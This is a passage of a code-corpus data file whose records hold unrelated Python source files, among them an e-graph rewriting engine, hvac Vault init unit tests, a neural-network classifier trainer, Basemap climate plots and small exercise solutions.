egraph.get_id(subst[x])\n # x must be a constant\n return egraph.make(x)\n operands = [p.apply(egraph, subst) for p in self.sub_patterns]\n return egraph.make(self.op, *operands)\n\nclass Rewrite:\n def __init__(self, lhs, rhs, subst):\n # lhs and rhs are patterns\n self.lhs = lhs\n self.rhs = rhs\n # mapping -> \n self.subst = subst\n\n def apply(self, egraph, subst):\n '''\n ### interface\n subst -> enode\n '''\n return self.rhs.apply(\n egraph,\n {x2 : subst[x1]\n for x1, x2 in self.subst.items()})\n\ndef merge_substs(substs):\n merged = {}\n for subst in substs:\n if subst is None:\n return None\n for k, v in subst.items():\n if k in merged and merged[k] != v:\n return None\n merged[k] = v\n return merged\n\nclass EGraph:\n def __init__(self):\n self.counter = 0\n # node -> ids\n self.ids = {}\n # equivalence class over ids\n self.ec = DisjointSet()\n # mapping ids/values (not nodes) -> [(user, class id of user)]\n self.users = defaultdict(set)\n self.worklist = set()\n\n def size(self):\n return len(self.ids)\n\n def canonicalize(self, n):\n return ENode(n.op, tuple(self.ec.find(i) for i in n.operands))\n\n def make(self, op, *operands):\n return self.add(ENode(op, operands))\n\n def add(self, n):\n n = self.canonicalize(n)\n if n in self.ids:\n return self.ids[n]\n i = self.counter\n self.counter += 1\n self.ids[n] = i\n for j in n.operands:\n self.users[self.ec.find(j)].add((n, self.ec.find(i)))\n return i\n\n def get_id(self, n):\n assert n in 
self.ids\n        return self.ec.find(self.ids[n])\n\n    def merge(self, i, j):\n        i = self.ec.find(i)\n        j = self.ec.find(j)\n        if i == j:\n            return i\n\n        users = self.users[i].union(self.users[j])\n        self.ec.union(i, j)\n        i = self.ec.find(i)\n        self.worklist.add(i)\n        self.users[i] = users\n        return i\n\n    def rebuild(self):\n        while len(self.worklist) > 0:\n            worklist = { self.ec.find(i) for i in self.worklist }\n            self.worklist = set()\n            for i in worklist:\n                self.repair(i)\n\n    def repair(self, i):\n        for n, j in self.users[i]:\n            if n in self.ids:\n                del self.ids[n]\n            self.ids[self.canonicalize(n)] = self.ec.find(j)\n\n        new_users = {}\n        for n, j in self.users[i]:\n            n = self.canonicalize(n)\n            if n in new_users:\n                self.merge(j, new_users[n])\n            new_users[n] = self.ec.find(j)\n        self.users[i] = set(new_users.items())\n\n    def equal(self, i, j):\n        return self.ec.connected(i, j)\n\n    def match_class(self, i, pat):\n        for n, j in self.ids.items():\n            if i == j:\n                yield from self.match_node(n, pat)\n\n    def match_node(self, n, pat):\n        if not pat.match_local(n):\n            return\n\n        if pat.is_leaf:\n            # match the live-in to n\n            yield {pat.get_live_in(): n}\n            return\n\n        sub_matches = [self.match_class(operand, pat.get_sub_pattern(operand_id))\n                for operand_id, operand in enumerate(n.operands)]\n        for substs in itertools.product(*sub_matches):\n            subst = merge_substs(substs)\n            if subst is not None:\n                yield subst\n\n    def match(self, pat):\n        for n, i in self.ids.items():\n            for subst in self.match_node(n, pat):\n                yield i, subst\n\ndef saturate(egraph, rewrites, max_iters=1000):\n    for it in range(max_iters):\n        size = egraph.size()\n\n        matches = []\n        for rw in rewrites:\n            for i, subst in egraph.match(rw.lhs):\n                matches.append((i, subst, rw))\n\n        for i, subst, rw in matches:\n            egraph.merge(i, rw.apply(egraph, subst))\n\n        egraph.rebuild()\n\n        # saturated: a full pass added no new e-nodes\n        if size == egraph.size():\n            return it\n","repo_name":"ychen306/egraph","sub_path":"egraph.py","file_name":"egraph.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16389644669","text":"from pelix.ipopo.decorators import ComponentFactory, Property, Requires, Provides, Instantiate, Validate\n\nfrom api.api import ValidatorInput, Validator, WebSocketComponent\nimport logging\nimport json\n\n@ComponentFactory(\"validator-websocket-factory\")\n@Property('_path', 'websocketcomponent.path', '/validation')\n@Requires('_validator','validator')\n@Provides('websocketcomponent')\n@Instantiate(\"validator-websocket-inst\")\nclass ValidatorWebSocketComponent(WebSocketComponent):\n\n    def __init__(self):\n        super().__init__(self._path)\n    \n    @Validate\n    def validate(self, context):\n        print('ValidatorWebSocketComponent is active!')\n    \n    '''\n    \n    message = {\n    \n        'title': 'Some title for the catalog',\n        'description': 'Some description for the catalog',\n        'distributions': ['uri'*],\n        'store': true|false\n    \n    }\n    \n    '''\n    def execute(self, message: str, *args, **kwargs) -> str:\n        \n        _input = json.loads(message)\n        \n        logging.info(f'Validator input message {_input}')\n        \n        out = self._validator.do_job(ValidatorInput.from_dict(_input))\n        \n        out = {**_input, 'validation': out}\n        \n        ret = {\"status\": \"success\", \"content\": out}\n        \n        return 
json.dumps(ret)","repo_name":"whow-project/architecture","sub_path":"whow-toolkit/WHOWToolkit/validator/shacl_validator_ws.py","file_name":"shacl_validator_ws.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14758089731","text":"import pytest\n\nfrom hvac.exceptions import ParamValidationError\nfrom hvac.api.system_backend.init import Init\n\n\n@pytest.fixture\ndef sys_init(mock_adapter):\n return Init(mock_adapter)\n\n\nINIT_SECRET_PGP_ERROR_MSG = (\n r\"length of pgp_keys list argument must equal secret_shares value\"\n)\nINIT_RECOVERY_PGP_ERROR_MSG = (\n r\"length of recovery_pgp_keys list argument must equal recovery_shares value\"\n)\nINIT_RECOVERY_SHARES_ERROR_MSG = r\"value for recovery_threshold argument must be less than or equal to recovery_shares argument\"\nINIT_STORED_SHARES_ERROR_MSG = (\n r\"value for stored_shares argument must equal secret_shares argument\"\n)\n\n\nclass TestInit:\n @pytest.mark.parametrize(\n [\"secret_shares\", \"recovery_shares\", \"expected_value\", \"expected_warn\"],\n [\n (None, None, 5, True),\n (3, None, 3, False),\n (5, 7, 5, False),\n (None, 9, None, False),\n ],\n )\n def test_initialize_default_secret_shares(\n self,\n sys_init,\n mock_warn,\n secret_shares,\n recovery_shares,\n expected_value,\n expected_warn,\n ):\n (r_args, r_kwargs) = sys_init.initialize(\n secret_shares=secret_shares,\n recovery_shares=recovery_shares,\n recovery_threshold=0,\n )\n params = r_kwargs[\"json\"]\n assert params[\"secret_shares\"] == expected_value\n\n if expected_warn:\n mock_warn.assert_called_once()\n else:\n mock_warn.assert_not_called()\n\n @pytest.mark.parametrize(\n [\"secret_threshold\", \"recovery_threshold\", \"expected_value\", \"expected_warn\"],\n [\n (None, None, 3, True),\n (3, None, 3, False),\n (5, 7, 5, False),\n (None, 9, None, False),\n ],\n )\n def test_initialize_default_secret_threshold(\n self,\n sys_init,\n mock_warn,\n secret_threshold,\n recovery_threshold,\n expected_value,\n expected_warn,\n ):\n (r_args, r_kwargs) = sys_init.initialize(\n secret_threshold=secret_threshold,\n recovery_threshold=recovery_threshold,\n secret_shares=0,\n )\n params = r_kwargs[\"json\"]\n assert params[\"secret_threshold\"] == expected_value\n\n if expected_warn:\n mock_warn.assert_called_once()\n else:\n mock_warn.assert_not_called()\n\n @pytest.mark.parametrize(\n [\n \"secret_shares\",\n \"pgp_keys\",\n \"stored_shares\",\n \"recovery_shares\",\n \"recovery_pgp_keys\",\n \"recovery_threshold\",\n \"exc_msg\",\n ],\n [\n (\n 2,\n [1, 2, 3],\n 2,\n None,\n None,\n None,\n INIT_SECRET_PGP_ERROR_MSG,\n ),\n (\n 2,\n [1, 2, 3],\n 3,\n None,\n None,\n None,\n INIT_SECRET_PGP_ERROR_MSG,\n ),\n (\n 2,\n [1, 2],\n 3,\n None,\n None,\n None,\n INIT_STORED_SHARES_ERROR_MSG,\n ),\n (2, [1, 2], 2, 3, [1, 2], None, INIT_RECOVERY_PGP_ERROR_MSG),\n (2, [1, 2], 2, 3, [1, 2], 1, INIT_RECOVERY_PGP_ERROR_MSG),\n (2, [1, 2], 2, 3, [1, 2], 9, INIT_RECOVERY_SHARES_ERROR_MSG),\n ],\n )\n def test_initialize_errors(\n self,\n sys_init,\n mock_adapter,\n secret_shares,\n pgp_keys,\n stored_shares,\n recovery_shares,\n recovery_pgp_keys,\n recovery_threshold,\n exc_msg,\n ):\n with pytest.raises(ParamValidationError, match=exc_msg):\n sys_init.initialize(\n secret_threshold=0, # TODO(v3.0.0): remove this, only set to suppress warning\n secret_shares=secret_shares,\n pgp_keys=pgp_keys,\n stored_shares=stored_shares,\n recovery_shares=recovery_shares,\n 
recovery_pgp_keys=recovery_pgp_keys,\n                recovery_threshold=recovery_threshold,\n            )\n\n        mock_adapter.request.assert_not_called()\n\n    def test_initialize_value_pass(self, sys_init):\n        (r_args, r_kwargs) = sys_init.initialize(\n            secret_threshold=0,\n            secret_shares=2,\n            root_token_pgp_key=\"abc\",\n            pgp_keys=[1, 2],\n            stored_shares=2,\n            recovery_shares=3,\n            recovery_pgp_keys=[1, 2, 3],\n            recovery_threshold=3,\n        )\n        params = r_kwargs[\"json\"]\n\n        assert params[\"secret_threshold\"] == 0\n        assert params[\"secret_shares\"] == 2\n        assert params[\"root_token_pgp_key\"] == \"abc\"\n        assert params[\"pgp_keys\"] == [1, 2]\n        assert params[\"stored_shares\"] == 2\n        assert params[\"recovery_shares\"] == 3\n        assert params[\"recovery_pgp_keys\"] == [1, 2, 3]\n        assert params[\"recovery_threshold\"] == 3\n","repo_name":"hvac/hvac","sub_path":"tests/unit_tests/api/system_backend/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","stars":1152,"dataset":"github-code","pt":"72"} +{"seq_id":"12536214291","text":"from dataclasses import dataclass\nfrom typing import Optional\n\nfrom brevet_top_plot_a_route.route_point import RoutePoint\n\n\n@dataclass\nclass CheckPoint(RoutePoint):\n    name: str = None\n\n    def __init__(self, **kwargs):\n        name: str = kwargs.pop(\"name\", \"\")\n        super().__init__(**kwargs)\n        self.name = name\n        self.fix_name()\n\n    @classmethod\n    def from_route_point(cls, point: RoutePoint, name: str = \"\"):\n        return cls(**point.__dict__, name=name)\n\n    def __repr__(self):\n        return f\"<CheckPoint {self.name}>\"\n\n    def fix_name(self, replacement: Optional[str] = None) -> Optional[str]:\n        \"\"\"\n        Copy the point description to the name property\n\n        :param replacement: optional control name if not specified in the route\n        :return: the name\n        \"\"\"\n        self.name = (self.name or self.labtxt or self.dir or replacement or \"\").strip()\n        return self.name\n\n    def find_labels(self) -> list:\n        \"\"\"\n        Find checkpoints defined in symlabs/lab/labtxt tags.\n\n        :return: a list of new CheckPoints\n        \"\"\"\n        return [\n            CheckPoint(**label, labtxt=label.get(\"lab\", {}).get(\"labtxt\"))\n            for label in self.symlabs\n        ]\n","repo_name":"grisxa/brevet-top-functions","sub_path":"brevet_top_plot_a_route/src/brevet_top_plot_a_route/check_point.py","file_name":"check_point.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"92763958","text":"# def updown(name):\n#     answer = 0\n#     for n in name:\n#         if ord(n) == ord('Z'):\n#             answer += 1\n#         elif ord(n) > ord(\"L\") and ord(n) != ord('Z'):\n#             answer += 1\n#             answer += (ord('Z') - (ord(n)))\n#         else:\n#             answer +=((ord(n)) - ord('A'))\n#     return answer\n\n# def left(name):\n#     n = (len(name)//2) \n#     if 'A' in name[n:]:\n#         return (len(name) - (name.count('A'))-1)\n#     else:\n#         return (len(name) - 1)\n\n# def solution(name):\n#     print(updown(name))\n#     print(left(name))\n#     answer=updown(name) + left(name)\n#     return answer\n\n# Code taken from: https://jgrammer.tistory.com/entry/%ED%94%84%EB%A1%9C%EA%B7%B8%EB%9E%98%EB%A8%B8%EC%8A%A4-%EC%A1%B0%EC%9D%B4%EC%8A%A4%ED%8B%B1\n\ndef solution(name):\n    make_name = [min(ord(i) - ord(\"A\"), ord(\"Z\") - ord(i)+1) for i in name] #store the minimum presses (up vs. down) for each letter\n    idx, answer = 0, 0 \n    while True:\n        answer += make_name[idx]\n        make_name[idx] = 0\n        if sum(make_name) ==0: #check the characters one by one; once handled, the slot is zeroed \n            
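# nothing left to type anywhere, so the greedy walk is finished\n            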
break\n        left, right = 1, 1\n        while make_name[idx - left] ==0: #keep moving while the value is 0; we want the nearest remaining letter\n            left +=1\n        while make_name[idx + right] ==0: #likewise, keep moving sideways while it is 0\n            right +=1\n        answer += left if left < right else right #add the smaller of the two moves\n        idx += -left if left < right else right #if going left is cheaper the index decreases, otherwise it increases\n    return answer\n","repo_name":"ms-kim520/Coding_Study","sub_path":"programmers_level2_조이스틱.py","file_name":"programmers_level2_조이스틱.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14956749007","text":"from elasticai.creator.file_generation.savable import Path, Savable\nfrom elasticai.creator.file_generation.template import InProjectTemplate\n\n\nclass MacDesign(Savable):\n    def __init__(self, name: str, vector_width: int, fxp_params):\n        self._name = name\n        self._vector_width = vector_width\n        self._fxp_params = fxp_params\n\n    def save_to(self, destination: Path) -> None:\n        wrapper = InProjectTemplate(\n            package=\"elasticai.creator.nn.fixed_point.mac\",\n            file_name=\"mac_design.tpl.vhd\",\n            parameters={\n                \"total_width\": str(self._fxp_params.total_bits),\n                \"frac_width\": str(self._fxp_params.frac_bits),\n                \"vector_width\": str(self._vector_width),\n                \"name\": self._name,\n            },\n        )\n        core_component = InProjectTemplate(\n            package=\"elasticai.creator.nn.fixed_point.mac\",\n            file_name=\"fxp_mac.tpl.vhd\",\n            parameters={},\n        )\n        destination.create_subpath(\"fxp_mac\").as_file(\".vhd\").write(core_component)\n        destination.create_subpath(self._name).as_file(\".vhd\").write(wrapper)\n","repo_name":"es-ude/elastic-ai.creator","sub_path":"elasticai/creator/nn/fixed_point/mac/design.py","file_name":"design.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"72"} +{"seq_id":"12578535963","text":"\"\"\"\nTest the add_cyclic_point function from the cyclic module.\n\nIn this module we'll write simple functions to test the code we wrote\nfor add_cyclic_point in the cyclic module. 
We'll be using pytest to\nrun the tests, and for some helpful features when writing tests.\n\n\"\"\"\nimport numpy as np\n\nfrom cyclic import add_cyclic_point\n\n\ndef test_default():\n    \"\"\"\n    Test add_cyclic_point with a 1-d array and no keywords.\n\n    Input: [0, 1, 2, 3, 4]\n    Expected output: [0, 1, 2, 3, 4, 0]\n\n    \"\"\"\n    data = np.array([0, 1, 2, 3, 4], dtype=int)\n    cyclic_data = add_cyclic_point(data)\n    # The output should be 1 element longer than the input:\n    assert cyclic_data.size == data.size + 1\n    # The first and last elements of the output should be the same:\n    assert cyclic_data[0] == cyclic_data[-1]\n    # The elements of the output up-to the last should be the same as\n    # the input:\n    assert (cyclic_data[:-1] == data).all()\n","repo_name":"duncanwp/python_for_climate_scientists","sub_path":"course_content/pytest-example/test_cyclic.py","file_name":"test_cyclic.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"} +{"seq_id":"73597622953","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\n\n###### lat longs to plot #############\nlats = [34.097754, 34.164203, 32.718561, 31.104153, 31.708595, 30.316496, 30.086927, 29.945690, 27.338936, 27.084368]\nlons = [74.814425, 77.584813, 74.858092, 77.170973, 76.932037, 78.032188, 78.267609, 78.164246, 88.606506, 93.605316]\n\n\nnewx = np.arange(71.875,100.125,.25)\nnewy = np.arange(24.875,38.125,.25)\n\ncM = plt.cm.get_cmap('seismic')\nreversedCM = cM.reversed()\n\ncolorM = reversedCM\n\nindices3 = ['CDD']\nindices2 = ['SDII']\nindices = ['CWD','PRCPTOT', 'R10mm', 'R20mm', 'R95PTOT', 'R99PTOT', 'Rx1day', 'Rx5day']\n\nunits = { 'CDD' : 'days',\n'CWD': 'days',\n'PRCPTOT' : 'mm',\n'R10mm' : 'days',\n'R20mm' : 'days',\n'R95PTOT' : 'mm',\n'R99PTOT' : 'mm',\n'Rx1day' : 'mm',\n'Rx5day' : 'mm',\n'SDII' : 'mm'\n}\n\nfor index in indices2:\n    historical = np.load('Calculated Data\\historical\\\\'+ index +'_historical_40years.npy')\n    period1 = np.load('Calculated Data\\period1\\\\'+ index +'_period1_40years.npy')\n    period2 = np.load('Calculated Data\\period2\\\\'+ index +'_period2_40years.npy')\n\n    print(historical.shape)\n    print(period1.shape)\n    print(period2.shape)\n\n    fig, axes = plt.subplots(1,2, figsize=(10, 4))\n    fig.tight_layout(pad=2.0)\n\n\n\n    difference1 = period1-historical\n\n    difference2 = period2-historical\n\n################### Find maximum and minimum values and corresponding latitude and longitude ########################\n\n    print(np.max(difference1))\n    print(np.min(difference1))\n\n    print('-------------')\n\n    print(np.max(difference2))\n    print(np.min(difference2))\n    \n    \n    max1 = max(abs(np.max(difference1)), abs(np.min(difference1)))\n    \n    max2 = max(abs(np.max(difference2)), abs(np.min(difference2)))\n\n    minmin = -(max(max1,max2))\n    maxmax = max(max1,max2)\n\n    print(minmin)\n    print(maxmax)\n\n    ################################\n    \n\n\n\n    axes[0].set_title('(a) Change in '+ index +' in Period 1 (2021-2060)')\n    map = Basemap(resolution='l', llcrnrlon=72, llcrnrlat=25, urcrnrlon=100, urcrnrlat=38, lat_0=22.5, lon_0= 85, ax=axes[0])\n\n    # Plot Data\n    cs = map.pcolor(newx, newy, difference1, cmap=colorM, shading='auto', vmin=minmin, vmax=maxmax)\n    map.readshapefile(r'ShapeFiles\\Uttarakhand' , 'Uttarakhand')\n    map.readshapefile('ShapeFiles\\ArunachalPradesh' , 'ArunachalPradesh', default_encoding='ISO-8859-1')\n    map.readshapefile('ShapeFiles\\HimachalPradesh', 'Himachal_Pradesh')\n    
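# overlay the remaining state boundaries from the local shapefiles\n    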
map.readshapefile('ShapeFiles\\Jammu_state', 'Jammu_state')\n map.readshapefile('ShapeFiles\\Sikkim', 'Sikkim')\n # map.readshapefile('ShapeFiles\\Cities\\cities2', 'Cities')\n\n # North Arrow\n x, y = map(97, 37)\n x2, y2 = (97, 34)\n\n axes[0].annotate('N', xy=(x, y), xycoords='data',\n xytext=(x2, y2), textcoords='data',\n arrowprops=dict(arrowstyle=\"->\")\n )\n \n \n a, b = map(lons, lats)\n\n map.scatter(a, b, marker='^',color='g')\n\n\n\n map.drawcountries()\n\n # Add Colorbar\n cbar = map.colorbar(cs, location='bottom', pad=\"5%\")\n cbar.set_label(units[index])\n\n ################################\n\n\n\n axes[1].set_title('(b) Change in '+ index +' in Period 2 (2061-2100)')\n map = Basemap(resolution='l', llcrnrlon=72, llcrnrlat=25, urcrnrlon=100, urcrnrlat=38, lat_0=22.5, lon_0= 85, ax=axes[1])\n\n # Plot Data\n cs = map.pcolor(newx, newy, difference2, cmap=colorM, shading='auto', vmin=minmin, vmax=maxmax)\n map.readshapefile(r'ShapeFiles\\Uttarakhand' , 'Uttarakhand')\n map.readshapefile('ShapeFiles\\ArunachalPradesh' , 'ArunachalPradesh', default_encoding='ISO-8859-1')\n map.readshapefile('ShapeFiles\\HimachalPradesh', 'Himachal_Pradesh')\n map.readshapefile('ShapeFiles\\Jammu_state', 'Jammu_state')\n map.readshapefile('ShapeFiles\\Sikkim', 'Sikkim')\n # map.readshapefile('ShapeFiles\\Cities\\cities2', 'Cities')\n\n # North Arrow\n x, y = map(97, 37)\n x2, y2 = (97, 34)\n\n axes[1].annotate('N', xy=(x, y), xycoords='data',\n xytext=(x2, y2), textcoords='data',\n arrowprops=dict(arrowstyle=\"->\")\n )\n\n \n map.drawcountries()\n\n a, b = map(lons, lats)\n\n map.scatter(a, b, marker='^',color='g')\n\n # Add Colorbar\n cbar = map.colorbar(cs, location='bottom', pad=\"5%\")\n cbar.set_label(units[index])\n\n\n # plotting\n # plt.suptitle('Difference in Consecutive Dry Days')\n plt.savefig('Plots\\Difference\\PPT\\\\'+ index + '.png')\n \n # plt.show()\n\n\n","repo_name":"tejaswarathe/Precipitation-analysis-Dissertation","sub_path":"Calculations/Plots/Difference.py","file_name":"Difference.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70413256234","text":"import sys\nimport math\n\nN = int(sys.stdin.readline())\nf = list(str(math.factorial(N)))\nf.reverse()\n\ncnt = 0\nfor i in f:\n if i == '0':\n cnt += 1\n else:\n break\nprint(cnt)","repo_name":"becca4011/Baekjoon","sub_path":"1676_팩토리얼 0의 개수.py","file_name":"1676_팩토리얼 0의 개수.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1860812096","text":"import layer as ly\nimport numpy\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import minmax_scale\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom time import sleep\nimport time\n\n\n#--------------------#\n\n\n# float -> float\n# Derivative of sigmoid function\ndef transferDerivative(x):\n return x*(1.0-x)\n\n# List, int -> List\n# Given a cardinal number and the number of classes, returns a binary classification vector\n# e.g classVector(1,3) = [0 1 0], classVector(1,2) = [0 1], classVector(0,1) = [0]\ndef classVector(vector, classes):\n num = vector[0]\n if(not type(num)==int):\n num = int(num)\n vec = [0]*classes\n vec[num%classes] = 1\n return vec\n\n# List -> List\n# Given a vector of real numbers between 0 and 1, returns an array with 0s and 1s\ndef toBin(vector):\n bin = []\n for num in 
vector:\n        if(num < 0.5):\n            bin.append(0)\n        else:\n            bin.append(1)\n    return bin\n\nclass Network:\n\n    # int, int, int, List -> Network\n    # Receives number of layers, number of inputs and number of neurons per layer of the network\n    def __init__(self, nlayers, ninputs, nneuronslayer):\n        self.mylayers = []\n        self.nlastlayer = nlayers-1\n        self.ninputs = ninputs\n        previousneurons = ninputs\n        for i in range(nlayers):\n            self.mylayers.append(ly.Layer(nneuronslayer[i], previousneurons))\n            previousneurons = nneuronslayer[i]\n\n\n    # List -> List\n    # Receives a Python list as input, returns the valuation of the network\n    def feed(self, input):\n        nextinput = input\n        for layer in self.mylayers:\n            nextinput = layer.feed(nextinput)\n        return nextinput\n\n\n    # List, List, [float] -> None\n    # Trains the network using the given inputs and desired outputs\n    def train(self, input, desiredoutput, learningrate = 0.2):\n        lr = learningrate\n        output = self.feed(input)\n        self.errorBackpropagation(desiredoutput)\n        self.updateWeightandBias(input, lr)\n\n    # None -> List\n    # Get the last output of the network\n    def getLastOutput(self):\n        return self.mylayers[self.nlastlayer].getOutputs()\n\n    # List -> None\n    # Updates delta in every neuron using the expected value\n    def errorBackpropagation(self, expected):\n        current = self.nlastlayer\n        while(current >= 0):\n            if(current == self.nlastlayer): #output layer\n                output = numpy.asarray(self.mylayers[current].getOutputs())\n                errorvector = expected - output\n                deltalist = (errorvector * transferDerivative(output)).tolist()\n                self.mylayers[current].updateDeltas(deltalist)\n                current-=1\n            else: #hidden and input layers\n                output = numpy.asarray(self.mylayers[current].getOutputs())\n                weightmatrix = numpy.asmatrix(self.mylayers[current+1].getWeights())\n                deltamatrix = numpy.asmatrix(self.mylayers[current+1].getDeltas())\n                errorvector = numpy.asarray(deltamatrix*weightmatrix)[0]\n                deltalist = (errorvector * transferDerivative(output)).tolist()\n                self.mylayers[current].updateDeltas(deltalist)\n                current-=1\n\n\n    # List -> None\n    # Updates the weights and bias of the network\n    def updateWeightandBias(self, input, lr):\n        current = 0\n        for layer in self.mylayers:\n            if(current == 0): #input layer\n                layer.updateWeightandBiasusingLR(input, lr)\n                current+=1\n            else: #current > 0\n                previousoutput = self.mylayers[current-1].getOutputs()\n                layer.updateWeightandBiasusingLR(previousoutput, lr)\n                current+=1\n\n\n#------------ Data loading ----------------------- #\n    # string, int, [float], [boolean] -> None\n    # Given a csv file name (e.g. \"data.csv\"), trains a classifier network for nepoch epochs,\n    # plotting the quadratic error and precision obtained.\n    def dataClasification(self, dtname, nepoch, learningrate = 0.2, randshuffle = False, timer = False):\n        try:\n            dt = numpy.loadtxt(dtname,delimiter = \",\") #Load the csv dataset\n        except:\n            print(\"No se encuentra el archivo \"+dtname)\n            return\n        rows, cols = dt.shape\n        X = dt[:,0:cols-1] #split into data and classes\n        X_norm = minmax_scale(X) #Normalize the data with the criterion seen in class\n        y = dt[:,cols-1:]\n        numofclasses = len(numpy.unique(y)) #compute the total number of classes\n        X_train, X_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.33, random_state = 27) #Split the data into train/test sets\n        error = []\n        precision = []\n        epochs = list(range(nepoch+1))\n        print(\"Trabajando con un dataset de \"+str(rows)+\" observaciones, con \"+str(cols)+\" atributos cada una\")\n        print(\"Número de épocas: \"+str(nepoch))\n        
print(\"¿Se reordena el training set en cada epoch?: \"+str(randshuffle))\n print(\"Learning rate de la red: \"+str(learningrate))\n print(\"Cantidad de clases del dataset: \"+str(numofclasses))\n sleep(2)\n print(\"Inicio de computo por epochs, esto toma tiempo...\")\n start_time = time.time()\n for epoch in epochs:\n if(randshuffle): #Mezclamos el orden de las tuplas en caso de quererlo\n X_train, y_train = shuffle(X_train, y_train)\n if(epoch == 0): #Anotamos valores sin training alguno de la red\n totalerror = 0\n for i in range(len(X_train)):\n expected = classVector(y_train[i],numofclasses) #Generamos el vector de clase deseado\n raw_output = self.feed(X_train[i]) #Output sin entrenar\n errorvector = numpy.asarray(expected) - numpy.asarray(raw_output) #Comparamos output y expected\n squarevector = errorvector**2\n totalerror += squarevector.sum() #Guardamos el error cuadrático\n meanerror = (totalerror*1.0)/len(X_train) #Sacamos la media de los errores\n error.append(meanerror)\n #Fin de check de errores sin training\n #Calculo de precision sin training\n hits = 0\n for j in range(len(X_test)):\n output = self.feed(X_test[j])\n binOutput = toBin(output) #Discretizamos el vector de salida\n expected = classVector(y_test[j],numofclasses)\n if(expected == binOutput):\n hits += 1 #Si son iguales, entonces es un acierto\n epochprec = hits*1.0/len(X_test)\n precision.append(epochprec)\n print(\"Fin epoch \"+str(epoch)+\"!\")\n #Fin de testing, se acumula la precision en el vector correspondiente\n else:\n #Inicio de training\n totalerror = 0\n for i in range(len(X_train)):\n expected = classVector(y_train[i],numofclasses) #Generamos el vector de clase deseado\n self.train(X_train[i], expected, learningrate) #Entrenamos a la red\n errorvector = numpy.asarray(expected) - numpy.asarray(self.getLastOutput()) #Comparamos output y expected\n squarevector = errorvector**2\n totalerror += squarevector.sum() #Guardamos el error cuadrático\n meanerror = (totalerror*1.0)/len(X_train) #Sacamos la media de los errores\n error.append(meanerror)\n #Fin de training, se acumula error en el vector correspondiente\n #Inicio de testing\n hits = 0\n for j in range(len(X_test)):\n output = self.feed(X_test[j])\n binOutput = toBin(output) #Discretizamos el vector de salida\n expected = classVector(y_test[j],numofclasses)\n if(expected == binOutput):\n hits += 1 #Si son iguales, entonces es un acierto\n epochprec = hits*1.0/len(X_test)\n precision.append(epochprec)\n print(\"Fin epoch \"+str(epoch)+\"!\")\n #Fin de testing, se acumula la precision en el vector correspondiente\n tiempo = round(time.time() - start_time, 3)\n if(timer):\n print(\"Tiempo de proceso: \"+str(tiempo)+\" segundos\")\n return\n fullerror = numpy.asarray(error[1:]).sum()\n fullprecision = numpy.asarray(precision[1:]).sum()\n finalerror = round(fullerror/nepoch,3)\n finalprecision = round(fullprecision/nepoch, 3)\n plotcond = \"Learning rate =\"+str(learningrate)+\", Row Shuffle=\"+str(randshuffle)+\", (meanerror, meanprecision) = (\"+str(finalerror)+\", \"+str(finalprecision)+\")\"\n plt.subplot(2, 1, 1)\n plt.plot(epochs,error, '.-')\n plt.title(plotcond)\n plt.ylabel(\"Error cuadratico\")\n\n plt.subplot(2, 1, 2)\n plt.plot(epochs,precision, '.-')\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Precision\")\n 
plt.show()\n","repo_name":"sebcif/NeuronasPrim2018","sub_path":"Tarea1/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41781081813","text":"# -*- coding:utf-8 -*-\nimport numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\n#Histogram and probability density curve\na = np.random.normal(size=1000)\nprint(a,end=',')\nbins = np.arange(-4, 5)\nprint(bins)\nhistogram = np.histogram(a, bins=bins, density=True)[0]\nbins = 0.5 * (bins[1:] + bins[:-1])\nprint(bins)\n\nb = stats.norm.pdf(bins)#plot the probability density curve of the fitted normal distribution\nplt.plot(bins, histogram)\nplt.plot(bins, b)\nplt.show()\n\n# Percentiles: a percentile is an estimator of the CDF (cumulative distribution function).\nprint(np.median(a))\nprint(stats.scoreatpercentile(a, 50))\nprint(stats.scoreatpercentile(a, 90))\n\n# Statistical tests\nc = np.random.normal(0, 1, size=100)\nd = np.random.normal(1, 1, size=10)\nprint(stats.ttest_ind(c, d))\n","repo_name":"Susuqu/bioinformatics","sub_path":"private_pku/docs/ppt/ref/scipy_stats.py","file_name":"scipy_stats.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14812252879","text":"from folium import folium\n\nimport methods\nimport trasy\nimport markers\n\nlat = 50.74028\nlng = 16.64504\n\nmapka = folium.Map(location=[lat, lng], zoom_start=8, control_scale=True)\ntrasy.trasy_sudety2016(mapka)\ntrasy.trasy_sudety2018(mapka)\ntrasy.trasy_sudety2019(mapka)\nmarkers.corona_marker(mapka)\nmethods.popup2015do2020(mapka, lat, lng)\ntooltip = 'RAPORT z wszystkich tras w Sudetach i Górach Świętokrzyskich'\nmethods.marker_raport(mapka, lat, lng, methods.popup_raport(), 